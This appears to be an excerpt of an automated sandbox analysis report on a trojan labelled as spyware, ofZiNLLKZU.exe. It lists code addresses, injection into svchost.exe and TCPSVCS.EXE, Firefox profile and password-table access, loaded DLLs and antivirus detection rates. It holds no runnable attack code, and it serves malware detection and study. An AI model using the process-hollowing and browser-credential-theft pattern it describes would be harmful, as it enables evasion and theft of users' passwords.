                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE2F302_2_03AE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADCD1F2_2_03ADCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A856302_2_03A85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B095C32_2_03B095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD22_2_03A03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD52_2_03A03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E502C05_2_02E502C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E702745_2_02E70274
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E903E65_2_02E903E6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DDE3F05_2_02DDE3F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8A3525_2_02E8A352
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E620005_2_02E62000
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E881CC5_2_02E881CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E901AA5_2_02E901AA
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E841A25_2_02E841A2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E581585_2_02E58158
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DC01005_2_02DC0100
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6A1185_2_02E6A118
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DEC6E05_2_02DEC6E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DCC7C05_2_02DCC7C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DF47505_2_02DF4750
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD07705_2_02DD0770
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E7E4F65_2_02E7E4F6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E824465_2_02E82446
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E744205_2_02E74420
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E905915_2_02E90591
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD05355_2_02DD0535
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DCEA805_2_02DCEA80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E86BD75_2_02E86BD7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8AB405_2_02E8AB40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DFE8F05_2_02DFE8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DB68B85_2_02DB68B8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DDA8405_2_02DDA840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD28405_2_02DD2840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E9A9A65_2_02E9A9A6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD29A05_2_02DD29A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DE69625_2_02DE6962
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8EEDB5_2_02E8EEDB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DE2E905_2_02DE2E90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8CE935_2_02E8CE93
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD0E595_2_02DD0E59
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8EE265_2_02E8EE26
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DC2FC85_2_02DC2FC8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DDCFE05_2_02DDCFE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4EFA05_2_02E4EFA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E44F405_2_02E44F40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E12F285_2_02E12F28
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E72F305_2_02E72F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DF0F305_2_02DF0F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DC0CF25_2_02DC0CF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E70CB55_2_02E70CB5
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD0C005_2_02DD0C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DCADE05_2_02DCADE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DE8DBF5_2_02DE8DBF
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DDAD005_2_02DDAD00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6CD1F5_2_02E6CD1F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E712ED5_2_02E712ED
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DEB2C05_2_02DEB2C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD52A05_2_02DD52A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E1739A5_2_02E1739A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DBD34C5_2_02DBD34C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8132D5_2_02E8132D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E870E95_2_02E870E9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8F0E05_2_02E8F0E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD70C05_2_02DD70C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E7F0CC5_2_02E7F0CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DDB1B05_2_02DDB1B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E9B16B5_2_02E9B16B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E0516C5_2_02E0516C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DBF1725_2_02DBF172
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E816CC5_2_02E816CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E156305_2_02E15630
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8F7B05_2_02E8F7B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DC14605_2_02DC1460
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8F43F5_2_02E8F43F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E995C35_2_02E995C3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6D5B05_2_02E6D5B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E875715_2_02E87571
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E7DAC65_2_02E7DAC6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E15AA05_2_02E15AA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E71AA35_2_02E71AA3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6DAAC5_2_02E6DAAC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E43A6C5_2_02E43A6C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8FA495_2_02E8FA49
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E87A465_2_02E87A46
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E45BF05_2_02E45BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E0DBF95_2_02E0DBF9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DEFB805_2_02DEFB80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8FB765_2_02E8FB76
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD38E05_2_02DD38E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3D8005_2_02E3D800
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD99505_2_02DD9950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DEB9505_2_02DEB950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E659105_2_02E65910
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD9EB05_2_02DD9EB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD1F925_2_02DD1F92
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8FFB15_2_02E8FFB1
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8FF095_2_02E8FF09
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E8FCF25_2_02E8FCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E49C325_2_02E49C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DEFDC05_2_02DEFDC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E87D735_2_02E87D73
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02DD3D405_2_02DD3D40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E81D5A5_2_02E81D5A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00141C305_2_00141C30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013CB185_2_0013CB18
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013CB205_2_0013CB20
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AD305_2_0013AD30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013CD405_2_0013CD40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AE745_2_0013AE74
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AE805_2_0013AE80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AEC95_2_0013AEC9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001452D05_2_001452D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001434D05_2_001434D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001434CB5_2_001434CB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0015B8F05_2_0015B8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3E2175_2_02A3E217
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3E3385_2_02A3E338
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3D7985_2_02A3D798
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3CA245_2_02A3CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E05130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E17E54 appears 111 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02DBB970 appears 280 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E4F290 appears 105 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: String function: 005EF9F2 appears 40 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: String function: 005F0A30 appears 46 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: String function: 005D9CB3 appears 31 times
                Source: ofZiNLLKZU.exe, 00000000.00000003.1469453905.00000000044FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ofZiNLLKZU.exe
                Source: ofZiNLLKZU.exe, 00000000.00000003.1468456820.0000000004353000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ofZiNLLKZU.exe
                Source: ofZiNLLKZU.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006437B5 GetLastError,FormatMessageW,0_2_006437B5
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006310BF AdjustTokenPrivileges,CloseHandle,0_2_006310BF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006316C3
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006451CD
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0065A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0065A67C
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0064648E
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005D42A2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeFile created: C:\Users\user\AppData\Local\Temp\aut1E9C.tmpJump to behavior
                Source: ofZiNLLKZU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TCPSVCS.EXE, 00000005.00000003.1944069759.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1949608269.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.00000000029F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ofZiNLLKZU.exeReversingLabs: Detection: 71%
                Source: ofZiNLLKZU.exeVirustotal: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\ofZiNLLKZU.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"Jump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeSection loaded: iphlpapi.dllJump to behavior
